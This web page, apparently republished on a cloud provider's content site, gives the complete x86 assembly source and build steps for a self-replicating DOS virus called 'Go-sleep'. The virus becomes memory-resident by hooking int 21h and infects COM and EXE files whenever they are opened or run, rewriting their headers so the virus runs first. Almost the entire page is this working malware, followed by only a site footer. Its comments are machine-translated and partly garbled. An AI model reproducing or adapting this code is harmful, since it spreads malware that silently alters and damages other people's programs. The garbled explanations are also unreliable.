Write viruses that infect COM and EXE files

Source: Internet
Author: User
Tags file size header mail relative reset save file sleep

This program is d by the V0 virus modification upgrade and come
To have a certain contagious ability under DOS
; 32-bit programming is applied in this program part
; The production method is as follows
; Tasm32 Dv1;
; Tlink Dv1;
;D Ebug Dv1.exe
;-N dv1.com
;-W
; q
; finally generate the Dv1.com virus program
Off Equ Offset
DOSMCB struc;D OS Memory control chain structure (partial)
Flag db?; is ' M ' is not the last piece; is ' Z ' is the last piece
Owner DW?; is 008: is all system; 0 is unused memory block
Sizes DW?; This block size, calculated by section (1 =10h bytes)
DOSMCB Ends
Exeheader Struc; EXE file header structure
Flags DW ' ZM '; EXE file flag
Modsize DW?; EXE file last page of bytes
Pages DW?; EXE file pages (1 pages 512 bytes)
Reloc DW?; EXE files from the number of anchor items
Mesize DW?; Number of header sections in this article
Minmem DW?; The minimum memory (section) required by the program
Maxmem DW?; The maximum memory required by the program (section)
STARTSS DW?; program SP initial value
STARTSP DW?; program relative SS initial value
CheckSum DW?; file header check and
StartIP DW?; program IP initial value
Startcs DW?; program relative to CS initial value
Relocoff DW?; offset from positioning information
Exeheader Ends
Virussize=off @ @End-off @ @Start; (virus size)
Virusmemsize=off @ @MemEnd-off @ @Start; (the amount of memory required by the virus)
.386
. Model Small
. Code
Org 100h, written in COM format
@ @Start:; virus boot block
Pusha, saving all universal registers
MOV AX,4D4DH
int 21h; whether memory resides (custom interrupts)
CMP AX,4D4DH
JZ short @ @ExecOldApp; no, call the installation module
Call @ @Install
@ @ExecOldApp:
MOV ah,2ch
int 21h; Get system time
CMP cx,22*100h+30; (CMP time: 22:30)
JB Short @ @TestFlag; no display message is invoked until 22:30
Call @ @DisplayMsg, calling performance block
@ @TestFlag:
A CLC is a CLC instruction, indicating a COM file (if it is changed to STC when it is transmitted)
JC Short @ @IsExeApp
@ @IsComApp:
Call @ @GetOldComAppCode
Oldappcode DW 20CDH 20CDH is an int 20h command to return to Dos
DW 0000h; Here to save the original com file header 4 bytes of information
@ @GetOldComAppCode:
Pop si; get Oldappcode's address
MOV di,100h
Cld
Lodsd
stosd; restore original COM head 4 bytes
Popa; restore all general-purpose mail
Push word ptr 100h
RET; to execute the original COM program
@ @IsExeApp:
Popa; restore all general-purpose mail
CLI; To turn off interrupts when changing the stack pointer
mov sp,es; get PSP (SP=PSP section address)
Add sp,10h
Spadddata DW 0c481h;0bch is the Add sp,xxxx directive
OLDAPPSS DW 000h; original EXE file SS relative value
MOV ss,sp; compute the original program stack and restore
MOVEDATATOSP db 0bch 0bch is mov sp,xxxx instruction
OLDAPPSP DW 000h; original EXE file SP value
STI; break off from a new start
Push AX
mov ax,es; get PSP (AX=PSP section address)
Add ax,10h
Axadddata db 005h 05h is the add ax,xxxx instruction, calculate the original program CS value
Oldappcs DW 000h; original EXE file CS relative value
MOVZX esp,sp, converting to 32-bit [ESP] Stack-addressing
Xchg AX,[ESP]; recovery ax instead of "Xchg AX,[SP]" 16-bit does not support [SP] Stack-Addressing
Pushworddata db 068h 068h is a push word ptr xxxx instruction
Oldappip DW 000h; original EXE file IP value
RETF to execute the original EXE program
@ @Install:
Push DS
Push es; Save segment Registers
MOV Ax,ds
Dec ax; Get your own MCB structure segment, which is in front of the program's PSP
@ @ContFindLastMcb:
MOV Ds,ax
CMP Ds:[flag], ' Z '; is that the last piece?
JZ Short @ @FoundLastMcb
Add ax,ds:[sizes]
Inc AX calculates the next MCB segment = This block segment address + this block size +1
JMP Short @ @ContFindLastMcb
@ @FoundLastMcb:
Sub ds:[sizes], (virusmemsize/10h) +1; Subtract the last chunk of the virus from the amount of memory required (number of sections)
Add ax,ds:[sizes]
Inc AX; Compute the address of the virus in the high-end RAM (that is, the space segment in the last piece)
MOV Es,ax
XOR Di,di
Push CS
Pop ds; Reset data segment
Call @ @GetVirusBase
@ @GetVirusBase:
Pop si
Sub Si,off @ @GetVirusBase-off @ @Start; get virus first address
MOV cx,virussize
Cld
Rep MOVSB; carry the virus to a high-end address
Sub ax,10h; Compute the segment address of the high-end virus (for the virus to be offset, so subtract 10h)
MOV Ds,ax
@ @ContInstall:
MOV ax,3521h
int 21h; takes the interrupt vector of int 21h and saves
MOV ds:oldint21seg,es
MOV ds:oldint21off,bx
Lea dx,@ @NewInt21
MOV ax,2521h
int 21h; set new int 21h processor to @ @NewInt21
Pop es
Pop ds
Ret
@ @NewInt21:; new Int21 H Service Program (infection block)
CMP AX,4D4DH
JNZ Short @ @NextHook
Iret; is a custom interrupt, direct return
@ @NextHook:
CMP AH,4BH
JZ Short @ @MyBeCom
CMP ah,43h
JZ Short @ @MyBeCom
CMP AH,3DH
JZ short @ @MyBeCom intercept 4b,43,3d dos function
@ @JmpOldInt21:
CLI; Before entering the int21h, need to turn off the interrupt!
Jmpfar db 0eah, far jump instruction JMP xxxx:xxxx
Oldint21off DW?
Oldint21seg DW?
@ @CallInt21:; analog int 21h Instruction
Pushf
Push CS
Call @ @JmpOldInt21
Ret
@ @MyBeCom:; entry parameter ds:dx= com filename string ending with 0
Pusha
Push DS
MOV si,dx
XOR Al,al
@ @ContFindExtName:; Find extension
Inc si
CMP [Si],al
JNZ Short @ @ContFindExtName
MOV eax,[si-4]
or eax,20202020h; converting to lowercase letters
cmp eax, ' MOC. ' is a. com file?
JZ Short @ @IsComFile
cmp eax, ' exe. '; is an. exe file?
JZ Short @ @IsExeFile
@ @ExitOpt:
Pop ds
Popa
JMP Short @ @JmpOldInt21
@ @IsComFile:
MOV ax,3d02h
Call @ @CallInt21 3DH, open com file
JC Short @ @OptComFalse; failed
MOV Bx,ax
Push CS
Pop ds; Reset data segment
mov ds:byte ptr[@ @TestFlag],0f8h; set to the CLC directive, which means that the infected COM file
Lea Dx,oldappcode
MOV cx,4
MOV ah,3fh
int 21h; Read File header 4 bytes
JC Short @ @CloseComFile
MOV si,dx
CMP word ptr[si], ' ZM '; exe file (whether COM file cannot be judged by extension only)
JZ short @ @CloseComFile; it's not contagious.
CMP byte ptr[si+3], ' V ', infected virus flag
JZ short @ @CloseComFile; it means the program is infected.
MOV ax,4202h
XOR cx,cx
XOR DX,DX
int 21h; Moves the file pointer to the end of the file, returning the dx:ax= file length
or DX,DX
JNZ short @ @CloseComFile; The file is too large to be infected
MOV Dx,ax
Add Ax,virussize
JC Short @ @CloseComFile; files are too large to infect
CMP ax,0fd00h
JA short @ @CloseComFile; The file is too large to be infected
Sub dx,03; calculate the offset of jmp virus
MOV ds:jmpoffset,dx
Lea dx,@ @Start
MOV cx,virussize
MOV ah,40h
int 21h; write virus to file tail
MOV ax,4200h
XOR cx,cx
XOR DX,DX
int 21h; Move the file pointer to the top of the file
MOV cx,04h
Lea dx,@ @JmpVirus
MOV ah,40h
int 21h; write jmp virus and Virus flag 4 bytes to file header
@ @CloseComFile:
MOV Ah,3eh
int 21h; closing file
@ @OptComFalse:
JMP Short @ @ExitOpt
@ @IsExeFile:
MOV ax,3d02h
Call @ @CallInt21 3DH, open exe file
JC @ @OptExeFalse, failure
MOV Bx,ax
Push CS
Pop ds; Reset data segment
mov ds:byte ptr[@ @TestFlag],0f9h; set to STC directive, which means that the infection is EXE file.
Lea Dx,myexeheader
MOV cx,size exeheader
MOV ah,3fh
int 21h; Read File header 4 bytes
JC @ @CloseExeFile
CMP AX,CX
JB @ @CloseExeFile
MOV si,dx
CMP word ptr[si. Flags], ' ZM '; exe file (whether EXE file cannot be judged by extension only)
JNZ @ @CloseExeFile; No, it's not contagious.
cmp [SI. CheckSum], ' VV '; Is there an infected virus flag
JZ @ @CloseExeFile; it means the program is infected.
MOV ax,4202h
XOR cx,cx
XOR DX,DX
int 21h; Moves the file pointer to the end of the file, returning the dx:ax= file length
CMP dx,8h
JA short @ @CloseExeFile; The file is too large, possibly a Windows application
SHL edx,16
MOV Dx,ax
push edx; Save File size
SHR edx,4
Sub Dx,[si. Mesize]; Calculating the new relative CS in the EXE program of the virus
and ax,0fh the new Ip value of the virus in the EXE program (0=<IP<10H)
mov cx,dx; cx=dx= New relative CS value
Xchg [Si. Startcs],dx
mov ds:[oldappcs],dx; modify relative CS value, save the original relative CS value
Xchg [Si. Startss],cx
mov ds:[oldappss],cx; modify relative SS value, save the original relative SS value
Xchg [Si. Startip],ax
mov ds:[oldappip],ax; Modify IP value, save original IP value
XOR Ax,ax
Xchg [Si. Startsp],ax, modifying SP values, saving original SP values
MOV Ds:[oldappsp],ax
mov [SI. CheckSum], ' VV '; set the infection flag
Pop edx; popup file size
MOV ecx,virussize
Add edx,ecx; Calculate the size of the file after infection
MOV ax,dx
and AX,1FFH the modsize of the infected file
mov [SI. Modsize],ax
Add EDX,1FFH
SHR edx,9; Compute the pages of the infected file
mov [SI. Pages],dx
Lea dx,@ @Start
MOV ah,40h
int 21h; write virus to file tail
MOV ax,4200h
XOR cx,cx
XOR DX,DX
int 21h; Move the file pointer to the top of the file
MOV cx,size exeheader
Lea Dx,myexeheader
MOV ah,40h
int 21h; Write file headers to file header
@ @CloseExeFile:
MOV Ah,3eh
int 21h; closing file
@ @OptExeFalse:
JMP @ @ExitOpt
@ @JmpVirus:
Jumpnear DB 0e9h, near-transfer instruction JMP near XXXX
Jmpoffset DW?
Virusflag db ' V '; virus flag is ' V ' character
@ @DisplayMsg:
Pop DX
Push DX
Add Dx,off @ @Message-off @ @TestFlag; calculate the offset of @ @Message
Push DS
Push CS
Pop ds
MOV ah,09h
int 21h; display information, "The Night is deep, you should sleep!"
Pop ds
Ret
@ @Message:
DB 0ah,0dh,07h
DB ' Night is deep,you must go sleep! '
DB 0AH,0DH, ' $ '
DB ' Go-sleep Ver3.0 by WHG 2001.5.2 '
@ @End:
Myexeheader db size Exeheader dup (?)
@ @MemEnd:
End @ @Start

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.